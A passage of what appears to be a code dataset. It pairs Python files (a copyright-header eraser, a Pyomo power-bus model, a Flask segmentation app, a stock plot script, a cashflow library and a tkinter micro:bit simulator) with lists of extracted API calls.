TrainingParams, LossFunction\n'), ((819, 948), 'ModelSpecification.GraphAttributeFormat', 'GraphAttributeFormat', ([], {'node_format': 'NodeFormat.HasMovedClasses', 'edge_format': 'EdgeFormat.Dummy', 'global_format': 'GlobalFormat.Dummy'}), '(node_format=NodeFormat.HasMovedClasses, edge_format=\n EdgeFormat.Dummy, global_format=GlobalFormat.Dummy)\n', (839, 948), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((1044, 1992), 'ModelSpecification.ClothKeypoints', 'ClothKeypoints', ([], {'keypoint_indices': '[4, 127, 351, 380, 395, 557, 535, 550, 756, 783, 818, 1258, 150, 67, 420, \n 436, 920, 952, 1069, 1147, 1125, 1099, 929, 464, 142, 851, 1178, 49, \n 509, 1000, 641]', 'keypoint_edges': '[(4, 351), (4, 1258), (351, 380), (351, 818), (380, 395), (380, 783), (395,\n 756), (127, 557), (127, 1258), (557, 818), (557, 535), (535, 783), (535,\n 550), (550, 756), (783, 818), (818, 1258), (436, 1069), (436, 420), (\n 1069, 952), (952, 920), (420, 1099), (420, 464), (1099, 920), (1099, \n 1125), (920, 929), (464, 1125), (464, 67), (1125, 929), (1125, 1147), (\n 67, 1147), (150, 1147), (150, 929), (920, 1178), (1178, 535), (1178, \n 851), (150, 142), (851, 557), (851, 142), (851, 929), (142, 127), (509,\n 380), (509, 420), (509, 1000), (1000, 351), (1000, 464), (1000, 49), (\n 49, 4), (49, 67), (641, 127), (641, 4), (641, 67), (641, 150)]', 'fixed_keypoint_indices': '[395, 550, 756, 436, 952, 1069]'}), '(keypoint_indices=[4, 127, 351, 380, 395, 557, 535, 550, 756,\n 783, 818, 1258, 150, 67, 420, 436, 920, 952, 1069, 1147, 1125, 1099, \n 929, 464, 142, 851, 1178, 49, 509, 1000, 641], keypoint_edges=[(4, 351),\n (4, 1258), (351, 380), (351, 818), (380, 395), (380, 783), (395, 756),\n (127, 557), (127, 1258), (557, 818), (557, 535), (535, 783), (535, 550),\n (550, 756), (783, 818), (818, 1258), (436, 1069), (436, 420), (1069, \n 952), (952, 920), (420, 1099), (420, 464), (1099, 920), (1099, 1125), (\n 920, 929), (464, 1125), (464, 67), (1125, 929), (1125, 1147), (67, 1147\n ), (150, 1147), (150, 929), (920, 1178), (1178, 535), (1178, 851), (150,\n 142), (851, 557), (851, 142), (851, 929), (142, 127), (509, 380), (509,\n 420), (509, 1000), (1000, 351), (1000, 464), (1000, 49), (49, 4), (49, \n 67), (641, 127), (641, 4), (641, 67), (641, 150)],\n fixed_keypoint_indices=[395, 550, 756, 436, 952, 
1069])\n', (1058, 1992), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((2708, 2933), 'ModelSpecification.GraphNetStructure', 'GraphNetStructure', ([], {'encoder_node_layers': '[64, 64]', 'encoder_edge_layers': '[64, 64]', 'encoder_global_layers': '[128]', 'core_node_layers': '[128, 64]', 'core_edge_layers': '[128, 64]', 'core_global_layers': '[128]', 'num_processing_steps': '(5)'}), '(encoder_node_layers=[64, 64], encoder_edge_layers=[64, 64\n ], encoder_global_layers=[128], core_node_layers=[128, 64],\n core_edge_layers=[128, 64], core_global_layers=[128],\n num_processing_steps=5)\n', (2725, 2933), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n'), ((3046, 3115), 'ModelSpecification.TrainingParams', 'TrainingParams', ([], {'frame_step': '(1)', 'movement_threshold': '(0.001)', 'batch_size': '(32)'}), '(frame_step=1, movement_threshold=0.001, batch_size=32)\n', (3060, 3115), False, 'from ModelSpecification import NodeFormat, EdgeFormat, GlobalFormat, PositionFrame, GraphAttributeFormat, GraphNetStructure, ModelSpecification, ClothKeypoints, TrainingParams, LossFunction\n')]
|
#####################################################################################
# MIT License #
# #
# Copyright (C) 2018 <NAME> #
# #
# This file is part of copyright-updater. #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy #
# of this software and associated documentation files (the "Software"), to deal #
# in the Software without restriction, including without limitation the rights #
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #
# copies of the Software, and to permit persons to whom the Software is #
# furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all #
# copies or substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #
# SOFTWARE. #
#####################################################################################
from .console_logger import ConsoleLogger
from .copyright import Copyright
from .comment_parameters import CommentParameters
from .comment import comment_copyright
from .find import find_copyright, is_copyright_exist
from shutil import copyfile
import os
def erase_copyright(target_file_name, with_backup):
with open(target_file_name, 'r') as f:
file_lines = f.readlines()
try:
copyright = find_copyright(file_lines)
    except Exception:  # narrowed from a bare except so KeyboardInterrupt/SystemExit pass through
ConsoleLogger.status('No copyright detected in ' + target_file_name + ' - skipping.')
return True
with open(target_file_name, 'r') as target_file:
target_content = target_file.read()
if with_backup:
copyfile(target_file_name, target_file_name + '.backup')
os.remove(target_file_name)
with open(target_file_name, 'w') as new_file:
copyright_content = ''.join(copyright.lines)
new_content = target_content.replace(copyright_content + '\n' + '\n', '')
new_content = new_content.replace(copyright_content + '\n', '')
new_content = new_content.replace(copyright_content, '')
new_file.write(new_content)
ConsoleLogger.success('Copyright erased in ' + target_file_name)
return True
|
[
"shutil.copyfile",
"os.remove"
] |
[((2928, 2955), 'os.remove', 'os.remove', (['target_file_name'], {}), '(target_file_name)\n', (2937, 2955), False, 'import os\n'), ((2867, 2923), 'shutil.copyfile', 'copyfile', (['target_file_name', "(target_file_name + '.backup')"], {}), "(target_file_name, target_file_name + '.backup')\n", (2875, 2923), False, 'from shutil import copyfile\n')]
|
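The erase routine above follows a common safe-rewrite pattern: back the file up first, delete it, then write the filtered content under the original name. A generic sketch of the same pattern; the drop_lines predicate is an illustrative assumption, not part of the original module:

import os
from shutil import copyfile

def rewrite_without(path, drop_lines, with_backup=True):
    # Rewrite `path` in place, dropping lines for which drop_lines(line) is True.
    with open(path) as f:
        lines = f.readlines()
    if with_backup:
        copyfile(path, path + '.backup')  # keep a recovery copy first
    os.remove(path)
    with open(path, 'w') as f:
        f.writelines(line for line in lines if not drop_lines(line))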
# -*- coding: utf-8 -*-
# Copyright 2021 Tampere University and VTT Technical Research Centre of Finland
# This software was developed as a part of the ProCemPlus project: https://www.senecc.fi/projects/procemplus
# This source code is licensed under the MIT license. See LICENSE in the repository root directory.
# Author(s): <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
"""
Contains class for Bus.
"""
import pyomo.environ as pyo
from economic_dispatch.model.units.base import _Unit
from economic_dispatch.model.factory import UnitFactory
def _get_index(name, from_list):
for index, u in enumerate(from_list):
if u.name == name:
return index
return None
class Bus:
"""
Bus containing all units related to this bus
...
Attributes
----------
name: str
name of the bus
units: dict
key: unit name, value: unit object
unit_names: list
list of unit names
Methods
-------
block_rule(block: pyo.Block)
Builds all the optimisation model components for this unit type
on top of the passed block.
topics(prefix: bool=True)
        returns a list of the bus's units' problem instance parameter names,
if prefix=True '{unit.name}.' is added before attribute names.
add(unit: _Unit)
add unit to bus
remove(name: str)
remove unit from bus
"""
def __init__(self, name, units=None):
"""
Parameters
----------
name: str
name of the bus
units: List
list of all unit objects related to this bus
"""
if units is None:
units = []
self.name = name
self._units = units
def __repr__(self):
return self.__class__.__name__ + '(units=' + str(list(self.unit_names)) + ')'
def add(self, unit):
""" Adds unit to bus. """
if isinstance(unit, _Unit):
self._units.append(unit)
else:
raise ValueError("Input unit is not valid")
def remove(self, name):
""" Removes unit from bus. """
if name in self.unit_names:
self._units.pop(_get_index(name, self._units))
def topics(self, prefix=True):
""" Return a list of bus's units' problem instance parameter names.
If prefix=True '{unit.name}.' is added before attribute names.
"""
return [t for u in self._units for t in u.topics(prefix=prefix)]
@property
def units(self):
""" Dictionary with unit names as keys and unit objects as values. """
return {u.name: u for u in self._units}
@property
def unit_names(self):
""" List of unit names. """
return list(self.units.keys())
def clear(self):
""" Sets problem instance parameter values of units to None. """
for unit in self._units:
unit.clear()
def ready(self):
""" Returns True if all problem instance parameter values are ready for all units. """
return all(unit.ready() for unit in self._units)
def block_rule(self, block):
"""
Builds all the optimisation model components for this bus
on top of the passed block.
The underlying model should have its time index set at attr T
Parameters
----------
block: pyo.Block
bus level block of the model.
"""
model = block.model()
network = block.parent_block()
def U_init(b):
return self.unit_names
block.U = pyo.Set(initialize=U_init)
# Block rules to units
def unit_rule(b, i):
self.units[i].block_rule(b)
block.Units = pyo.Block(block.U, rule=unit_rule)
# Optimized units
def controllable_init(b):
return [u for u in b.U if hasattr(b.Units[u], 'dispatch')]
block.C = pyo.Set(initialize=controllable_init)
# Total real power injection to bus
def inj_rule(b, i):
return sum(network.icd_matrix[self.name, line] * network.Lines[line].power_flow[i]
for line in network.L)
block.net_injection = pyo.Expression(model.T, rule=inj_rule)
# Dispatches minus electrical loads
def rp_rule(b, i):
return sum(b.Units[u].real_power[i] for u in b.U)
block.real_power = pyo.Expression(model.T, rule=rp_rule)
# Power balance constraint
def demand_rule(b, i):
return b.real_power[i] == b.net_injection[i]
block.demand_balance = pyo.Constraint(model.T, rule=demand_rule)
# Cost
def op_cost_rule(b, i):
return sum(b.Units[u].operational_cost[i] for u in b.U)
block.operational_cost = pyo.Expression(model.T, rule=op_cost_rule)
# Cost
def cost_rule(b, i):
return sum(b.Units[u].cost[i] for u in b.U)
block.cost = pyo.Expression(model.T, rule=cost_rule)
@classmethod
def from_json(cls, json_bus):
""" Creates a Bus from dictionary and returns it. """
json_units = json_bus.get("units")
units = []
for json_unit in json_units:
unit = UnitFactory.make_component(**json_unit)
units.append(unit)
json_bus["units"] = units
bus = Bus(**json_bus)
return bus
|
[
"economic_dispatch.model.factory.UnitFactory.make_component",
"pyomo.environ.Expression",
"pyomo.environ.Constraint",
"pyomo.environ.Block",
"pyomo.environ.Set"
] |
[((3565, 3591), 'pyomo.environ.Set', 'pyo.Set', ([], {'initialize': 'U_init'}), '(initialize=U_init)\n', (3572, 3591), True, 'import pyomo.environ as pyo\n'), ((3716, 3750), 'pyomo.environ.Block', 'pyo.Block', (['block.U'], {'rule': 'unit_rule'}), '(block.U, rule=unit_rule)\n', (3725, 3750), True, 'import pyomo.environ as pyo\n'), ((3902, 3939), 'pyomo.environ.Set', 'pyo.Set', ([], {'initialize': 'controllable_init'}), '(initialize=controllable_init)\n', (3909, 3939), True, 'import pyomo.environ as pyo\n'), ((4185, 4223), 'pyomo.environ.Expression', 'pyo.Expression', (['model.T'], {'rule': 'inj_rule'}), '(model.T, rule=inj_rule)\n', (4199, 4223), True, 'import pyomo.environ as pyo\n'), ((4386, 4423), 'pyomo.environ.Expression', 'pyo.Expression', (['model.T'], {'rule': 'rp_rule'}), '(model.T, rule=rp_rule)\n', (4400, 4423), True, 'import pyomo.environ as pyo\n'), ((4580, 4621), 'pyomo.environ.Constraint', 'pyo.Constraint', (['model.T'], {'rule': 'demand_rule'}), '(model.T, rule=demand_rule)\n', (4594, 4621), True, 'import pyomo.environ as pyo\n'), ((4772, 4814), 'pyomo.environ.Expression', 'pyo.Expression', (['model.T'], {'rule': 'op_cost_rule'}), '(model.T, rule=op_cost_rule)\n', (4786, 4814), True, 'import pyomo.environ as pyo\n'), ((4938, 4977), 'pyomo.environ.Expression', 'pyo.Expression', (['model.T'], {'rule': 'cost_rule'}), '(model.T, rule=cost_rule)\n', (4952, 4977), True, 'import pyomo.environ as pyo\n'), ((5210, 5249), 'economic_dispatch.model.factory.UnitFactory.make_component', 'UnitFactory.make_component', ([], {}), '(**json_unit)\n', (5236, 5249), False, 'from economic_dispatch.model.factory import UnitFactory\n')]
|
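For readers unfamiliar with the nested-block pattern in Bus.block_rule, here is a minimal stand-alone sketch built the same way: a Set indexes sub-blocks, a rule populates each sub-block, and an Expression aggregates over them. The unit names and the fixed demand of 5 are illustrative assumptions:

import pyomo.environ as pyo

model = pyo.ConcreteModel()
model.T = pyo.Set(initialize=[0, 1, 2])        # time index, as in the Bus model
model.U = pyo.Set(initialize=['gen1', 'gen2'])  # unit names

def unit_rule(b, u):
    m = b.model()
    b.real_power = pyo.Var(m.T, bounds=(0, 10))  # per-unit decision variable
model.Units = pyo.Block(model.U, rule=unit_rule)

def total_rule(m, t):
    # Aggregate over the sub-blocks, mirroring block.real_power above.
    return sum(m.Units[u].real_power[t] for u in m.U)
model.total_power = pyo.Expression(model.T, rule=total_rule)

def balance_rule(m, t):
    return m.total_power[t] == 5  # assumed fixed demand
model.balance = pyo.Constraint(model.T, rule=balance_rule)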
from datetime import datetime
from flask import Flask, request, render_template
from inference import get_category,save_image
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def fragment():
# Write the GET Method to get the index file
if request.method == 'GET':
return render_template('index.html')
# Write the POST Method to post the results file
if request.method == 'POST':
print(request.files)
if 'file' not in request.files:
print('File Not Uploaded')
return
# Read file from upload
file = request.files['file']
save_image(file,"input")
# Get category of prediction
model1 = 'modelDeepLabV3_Mila.tflite'
model2 = 'lite-model_deeplabv3-xception65_1_default_2.tflite'
model3 = 'lite-model_mobilenetv2-coco_dr_1.tflite'
        get_category(img=file, model=model1)  # saves output as image in static folder
        get_category(img=file, model=model2)
        get_category(img=file, model=model3)
#from flask import Response
return render_template('result.html', model1=model1, model2=model2, model3=model3)
#Response(category.getvalue(), mimetype='image/png')
if __name__ == '__main__':
# app.run(debug=True)
app.run(port=33507, debug=True) #set to port 33507 so it runs in heroku
|
[
"flask.Flask",
"inference.save_image",
"flask.render_template",
"inference.get_category"
] |
[((133, 148), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (138, 148), False, 'from flask import Flask, request, render_template\n'), ((305, 334), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (320, 334), False, 'from flask import Flask, request, render_template\n'), ((625, 650), 'inference.save_image', 'save_image', (['file', '"""input"""'], {}), "(file, 'input')\n", (635, 650), False, 'from inference import get_category, save_image\n'), ((870, 906), 'inference.get_category', 'get_category', ([], {'img': 'file', 'model': 'model1'}), '(img=file, model=model1)\n', (882, 906), False, 'from inference import get_category, save_image\n'), ((957, 993), 'inference.get_category', 'get_category', ([], {'img': 'file', 'model': 'model2'}), '(img=file, model=model2)\n', (969, 993), False, 'from inference import get_category, save_image\n'), ((1004, 1040), 'inference.get_category', 'get_category', ([], {'img': 'file', 'model': 'model3'}), '(img=file, model=model3)\n', (1016, 1040), False, 'from inference import get_category, save_image\n'), ((1095, 1170), 'flask.render_template', 'render_template', (['"""result.html"""'], {'model1': 'model1', 'model2': 'model2', 'model3': 'model3'}), "('result.html', model1=model1, model2=model2, model3=model3)\n", (1110, 1170), False, 'from flask import Flask, request, render_template\n')]
|
from matplotlib.finance import quotes_historical_yahoo
import sys
from datetime import date
import matplotlib.pyplot as plt
import numpy as np
today = date.today()
start = (today.year - 1, today.month, today.day)
symbol = 'DISH'
if len(sys.argv) == 2:
symbol = sys.argv[1]
quotes = quotes_historical_yahoo(symbol, start, today)
quotes = np.array(quotes)
close = quotes.T[4]
volume = quotes.T[5]
ret = np.diff(close)/close[:-1]
volchange = np.diff(volume)/volume[:-1]
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(ret, volchange, c=ret * 100, s=volchange * 100, alpha=0.5)
ax.set_title('Close and volume returns')
ax.grid(True)
plt.show()
|
[
"matplotlib.finance.quotes_historical_yahoo",
"matplotlib.pyplot.show",
"datetime.date.today",
"matplotlib.pyplot.figure",
"numpy.diff",
"numpy.array"
] |
[((152, 164), 'datetime.date.today', 'date.today', ([], {}), '()\n', (162, 164), False, 'from datetime import date\n'), ((289, 334), 'matplotlib.finance.quotes_historical_yahoo', 'quotes_historical_yahoo', (['symbol', 'start', 'today'], {}), '(symbol, start, today)\n', (312, 334), False, 'from matplotlib.finance import quotes_historical_yahoo\n'), ((344, 360), 'numpy.array', 'np.array', (['quotes'], {}), '(quotes)\n', (352, 360), True, 'import numpy as np\n'), ((481, 493), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (491, 493), True, 'import matplotlib.pyplot as plt\n'), ((646, 656), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (654, 656), True, 'import matplotlib.pyplot as plt\n'), ((408, 422), 'numpy.diff', 'np.diff', (['close'], {}), '(close)\n', (415, 422), True, 'import numpy as np\n'), ((446, 461), 'numpy.diff', 'np.diff', (['volume'], {}), '(volume)\n', (453, 461), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
# dcf
# ---
# A Python library for generating discounted cashflows.
#
# Author: sonntagsgesicht, based on a fork of Deutsche Postbank [pbrisk]
# Version: 0.7, copyright Tuesday, 31 May 2022
# Website: https://github.com/sonntagsgesicht/dcf
# License: Apache License 2.0 (see LICENSE file)
from collections import OrderedDict
from inspect import signature
from warnings import warn
from ..plans import DEFAULT_AMOUNT
from .payoffs import FixedCashFlowPayOff, RateCashFlowPayOff
class CashFlowList(object):
_cashflow_details = 'cashflow', 'pay date'
@property
def table(self):
""" cashflow details as list of tuples """
# print(tabulate(cf.table, headers='firstrow')) # for pretty print
header, table = list(), list()
for d in self.domain:
payoff = self._flows.get(d, 0.)
if hasattr(payoff, 'details'):
fwd = getattr(self, 'forward_curve', None)
details = payoff.details(fwd)
details['pay date'] = d
else:
details = {'cashflow': float(payoff), 'pay date': d}
for k in self.__class__._cashflow_details:
if k in details and k not in header:
header.append(k)
table.append(tuple(details.get(h, '') for h in header))
return [tuple(header)] + table
@property
def domain(self):
""" payment date list """
return self._domain
@property
def origin(self):
""" cashflow list start date """
if self._origin is None and self._domain:
return self._domain[0]
return self._origin
@property
def kwargs(self):
"""returns constructor arguments as ordered dictionary
(under construction)
"""
warn('%s().kwargs is under construction' % self.__class__.__name__)
kw = OrderedDict()
for name in signature(self.__class__).parameters:
attr = None
if name == 'amount_list':
attr = tuple(self._flows[d] for d in self.domain)
if name == 'payment_date_list':
attr = self.domain
attr = getattr(self, '_' + name, attr)
if isinstance(attr, (list, tuple)):
attr = tuple(getattr(a, 'kwargs', a) for a in attr)
attr = tuple(getattr(a, '__name__', a) for a in attr)
attr = getattr(attr, 'kwargs', attr)
attr = getattr(attr, '__name__', attr)
if attr is not None:
kw[name] = attr
return kw
def payoff(self, date):
"""dictionary of payoffs with pay_date keys"""
if isinstance(date, (tuple, list)):
return tuple(self.payoff(i) for i in date)
return self._flows.get(date, None)
def __init__(self, payment_date_list=(), amount_list=(), origin=None):
""" basic cashflow list object
        :param payment_date_list: list of cashflow dates
        :param amount_list: list of cashflow amounts
:param origin: origin of object,
i.e. start date of the cashflow list as a product
        Basically, |CashFlowList()| works like a read-only dictionary
with payment dates as keys.
And the |CashFlowList().domain| property holds the payment date list.
>>> from dcf import CashFlowList
>>> cf_list = CashFlowList([0, 1], [-100., 100.])
>>> cf_list.domain
(0, 1)
In order to get cashflows
>>> cf_list[0]
-100.0
>>> cf_list[cf_list.domain]
(-100.0, 100.0)
This works even for dates without cashflow
>>> cf_list[-1, 0 , 1, 2]
(0.0, -100.0, 100.0, 0.0)
"""
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
if not len(amount_list) == len(payment_date_list):
msg = f"{self.__class__.__name__} arguments " \
f"`payment_date_list` and `amount_list` " \
f"must have same length."
raise ValueError(msg)
self._origin = origin
self._domain = tuple(payment_date_list)
self._flows = dict(zip(payment_date_list, amount_list))
def __getitem__(self, item):
if isinstance(item, (tuple, list)):
return tuple(self[i] for i in item)
else:
payoff = self._flows.get(item, 0.)
if not isinstance(payoff, (int, float)):
_ = None
if hasattr(self, 'payoff_model'):
_ = self.payoff_model
elif hasattr(self, 'forward_curve'):
_ = self.forward_curve
payoff = payoff(_)
return payoff
def __call__(self, _=None):
flows = list()
for item in self.domain:
payoff = self._flows.get(item, 0.)
if not isinstance(payoff, (int, float)):
if _ is None:
if hasattr(self, 'payoff_model'):
_ = self.payoff_model
elif hasattr(self, 'forward_curve'):
_ = self.forward_curve
payoff = payoff(_)
flows.append(payoff)
return CashFlowList(self.domain, flows, self._origin)
def __add__(self, other):
for k in self._flows:
self._flows[k].__add__(other)
def __sub__(self, other):
for k in self._flows:
self._flows[k].__sub__(other)
def __mul__(self, other):
for k in self._flows:
self._flows[k].__mul__(other)
def __truediv__(self, other):
for k in self._flows:
self._flows[k].__truediv__(other)
def __str__(self):
inner = tuple()
if self.domain:
s, e = self.domain[0], self.domain[-1]
inner = f'[{s!r} ... {e!r}]', \
f'[{self._flows[s]!r} ... {self._flows[e]!r}]'
kw = self.kwargs
kw.pop('amount_list', ())
kw.pop('payment_date_list', ())
inner += tuple(f"{k!s}={v!r}" for k, v in kw.items())
s = self.__class__.__name__ + '(' + ', '.join(inner) + ')'
return s
def __repr__(self):
s = self.__class__.__name__ + '()'
if self.domain:
fill = ',\n' + ' ' * (len(s) - 1)
kw = self.kwargs
inner = \
str(kw.pop('payment_date_list', ())), \
str(kw.pop('amount_list', ()))
inner += tuple(f"{k!s}={v!r}" for k, v in kw.items())
s = self.__class__.__name__ + '(' + fill.join(inner) + ')'
return s
class CashFlowLegList(CashFlowList):
""" MultiCashFlowList """
@property
def legs(self):
""" list of |CashFlowList| """
return list(self._legs)
def __init__(self, legs):
""" container class for CashFlowList
:param legs: list of |CashFlowList|
"""
for leg in legs:
if not isinstance(leg, (CashFlowList, RateCashFlowList)):
cls = self.__class__.__name__, leg.__class__.__name__
raise ValueError("Legs %s of can be either `CashFlowList` "
"or `RateCashFlowList` but not %s." % cls)
self._legs = legs
domains = tuple(tuple(leg.domain) for leg in self._legs)
domain = list(sorted(set().union(*domains)))
origin = min(leg.origin for leg in self._legs)
super().__init__(domain, [0] * len(domain), origin=origin)
def __getitem__(self, item):
""" getitem does re-calc float cash flows and
does not use store notional values """
if isinstance(item, (tuple, list)):
return tuple(self[i] for i in item)
else:
return sum(
float(leg[item]) for leg in self._legs if item in leg.domain)
def __add__(self, other):
for leg in self._legs:
leg.__add__(other)
def __sub__(self, other):
for leg in self._legs:
leg.__sub__(other)
def __mul__(self, other):
for leg in self._legs:
leg.__mul__(other)
def __truediv__(self, other):
for leg in self._legs:
leg.__truediv__(other)
class FixedCashFlowList(CashFlowList):
_header_keys = 'cashflow', 'pay date'
def __init__(self, payment_date_list, amount_list=DEFAULT_AMOUNT,
origin=None):
""" basic cashflow list object
:param payment_date_list: list of cashflow payment dates
:param amount_list: list of cashflow amounts
:param origin: origin of object,
i.e. start date of the cashflow list as a product
"""
if isinstance(payment_date_list, CashFlowList):
amount_list = payment_date_list[payment_date_list.domain]
origin = origin or getattr(payment_date_list, '_origin', None)
payment_date_list = payment_date_list.domain
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
payoff_list = tuple(FixedCashFlowPayOff(amount=a) for a in amount_list)
super().__init__(payment_date_list, payoff_list, origin=origin)
class RateCashFlowList(CashFlowList):
""" list of cashflows by interest rate payments """
_cashflow_details = 'cashflow', 'pay date', 'notional', \
'start date', 'end date', 'year fraction', \
'fixed rate', 'forward rate', 'fixing date', 'tenor'
def __init__(self, payment_date_list, amount_list=DEFAULT_AMOUNT,
origin=None, day_count=None,
fixing_offset=None, pay_offset=None,
fixed_rate=0., forward_curve=None):
r""" list of interest rate cashflows
:param payment_date_list: pay dates, assuming that pay dates agree
with end dates of interest accrued period
:param amount_list: notional amounts
:param origin: start date of first interest accrued period
:param day_count: day count convention
:param fixing_offset: time difference between
interest rate fixing date and interest period payment date
:param pay_offset: time difference between
interest period end date and interest payment date
:param fixed_rate: agreed fixed rate
:param forward_curve: interest rate curve for forward estimation
Let $t_0$ be the list **origin**
and $t_i$ $i=1, \dots n$ the **payment_date_list**
with $N_i$ $i=1, \dots n$ the notional **amount_list**.
Moreover, let $\tau$ be the **day_count** function,
$c$ the **fixed_rate** and $f$ the **forward_curve**.
        Then, the rate cashflow $cf_i$ paid at time $t_i$ will be
with
$s_i = t_{i-1} - \delta$,
$e_i = t_i -\delta$
as well as
$d_i = s_i - \epsilon$
for **pay_offset** $\delta$ and **fixing_offset** $\epsilon$,
$$cf_i = N_i \cdot \tau(s_i,e_i) \cdot (c + f(d_i)).$$
Note, the **pay_offset** $\delta$ is not applied
in case of the first cashflow, then $s_1=t_0$.
"""
if isinstance(amount_list, (int, float)):
amount_list = [amount_list] * len(payment_date_list)
if origin is not None:
start_dates = [origin]
start_dates.extend(payment_date_list[:-1])
elif origin is None and len(payment_date_list) > 1:
step = payment_date_list[1] - payment_date_list[0]
start_dates = [payment_date_list[0] - step]
start_dates.extend(payment_date_list[:-1])
elif payment_date_list:
start_dates = payment_date_list
payoff_list = list()
for s, e, a in zip(start_dates, payment_date_list, amount_list):
if pay_offset:
e -= pay_offset
s -= pay_offset
payoff = RateCashFlowPayOff(
start=s, end=e, day_count=day_count,
fixing_offset=fixing_offset, amount=a,
fixed_rate=fixed_rate
)
payoff_list.append(payoff)
super().__init__(payment_date_list, payoff_list, origin=origin)
self.forward_curve = forward_curve
r""" cashflow forward curve to derive float rates $f$ """
@property
def fixed_rate(self):
fixed_rates = tuple(cf.fixed_rate for cf in self._flows.values())
if len(set(fixed_rates)) == 1:
return fixed_rates[0]
@fixed_rate.setter
def fixed_rate(self, value):
for cf in self._flows.values():
cf.fixed_rate = value
|
[
"collections.OrderedDict",
"warnings.warn",
"inspect.signature"
] |
[((1831, 1898), 'warnings.warn', 'warn', (["('%s().kwargs is under construction' % self.__class__.__name__)"], {}), "('%s().kwargs is under construction' % self.__class__.__name__)\n", (1835, 1898), False, 'from warnings import warn\n'), ((1912, 1925), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (1923, 1925), False, 'from collections import OrderedDict\n'), ((1946, 1971), 'inspect.signature', 'signature', (['self.__class__'], {}), '(self.__class__)\n', (1955, 1971), False, 'from inspect import signature\n')]
|
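As a quick numerical check of the formula in the RateCashFlowList docstring, cf_i = N_i * tau(s_i, e_i) * (c + f(d_i)), here is a hand-worked fixed-rate cashflow with no forward curve (f = 0). The float dates and the simple difference year fraction are illustrative assumptions, not the library's day-count conventions:

notional = 1000.0      # N_i
fixed_rate = 0.02      # c
start, end = 0.0, 0.5  # s_i, e_i as year fractions, a half-year accrual period

year_fraction = end - start                       # tau(s_i, e_i) = 0.5
cashflow = notional * year_fraction * fixed_rate  # 1000 * 0.5 * 0.02
assert abs(cashflow - 10.0) < 1e-9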
import tkinter as tk
import time
# Routine for non-implemented features.
def NOTIMPLEMENTED():
print(">>> Not implemented <<<")
# Simulate the face buttons.
class MicrobitButton(tk.Button):
def setup(self):
self.presses = 0
self.state = False
self.bind("<Button-1>", self.bpress)
self.bind("<ButtonRelease-1>", self.bunpress)
def get_presses(self):
return self.presses
def is_pressed(self):
return self.state
def bpress(self,x):
self.state = True
def bunpress(self,x):
self.state = False
self.increment()
def increment(self):
self.presses = self.presses + 1
class Image:
    def __init__(self, image_data=None):
        # Merged constructor: the previous duplicate zero-argument
        # __init__ was unreachable because this definition shadowed it.
        self.data = [x[:] for x in [[0] * 5] * 5]
        if image_data is None:
            return
if type(image_data) is str:
if len(image_data) == 1:
NOTIMPLEMENTED()
else:
l = image_data.split(":")
for j in range(5):
for i in range(5):
self.data[i][j] = int(l[j][i])
else:
for j in range(5):
for i in range(5):
self.data[i][j] = int(image_data[j][i])
class ledpack:
def __init__(self, canvas, context):
self.context = context
self.leds = [x[:] for x in [[0] * 5] * 5]
self.canvas = canvas
self.draw_leds()
self.turnedon=True
def draw_leds(self):
self.canvas.create_rectangle(0,0,200,200,fill='black')
for i in range(5):
for j in range(5):
if self.leds[i][j] >= 1:
shade = hex(int((self.leds[i][j] * 32) - 1))[2:]
if len(shade) == 1:
shade = "0" + shade
shade = "#" + shade + "0000"
self.canvas.create_rectangle(i*40,j*40,(i+1)*40,(j+1)*40,fill=shade)
self.canvas.update_idletasks()
self.context.update()
def set_pixel(self, x, y, value):
self.leds[x][y] = value
self.draw_leds()
def get_pixel(self, x, y):
return self.leds[x][y]
def clear(self):
self.leds = [x[:] for x in [[0] * 5] * 5]
self.draw_leds()
def on(self):
self.turnedon = True
def off(self):
self.turnedon = False
def is_on(self):
return self.turnedon
def read_light_level(self):
NOTIMPLEMENTED()
return 0
def scroll(self, value, delay=400, wait=True, loop=False, monospace=False):
NOTIMPLEMENTED()
def show(self, image):
for i in range(5):
for j in range(5):
self.leds[i][j] = image.data[i][j]
self.draw_leds()
# Set up stuff when imported.
_mb_win = tk.Tk()
_mb_win.title("Macro:Bit")
button_a = MicrobitButton(_mb_win, text="A")
button_b = MicrobitButton(_mb_win, text="B")
button_a.setup()
button_b.setup()
button_a.pack(side=tk.LEFT)
button_b.pack(side=tk.RIGHT)
_mb_can = tk.Canvas(_mb_win, width=200, height=200)
display = ledpack(_mb_can, _mb_win)
_mb_can.pack(expand=tk.YES, fill=tk.BOTH)
|
[
"tkinter.Canvas",
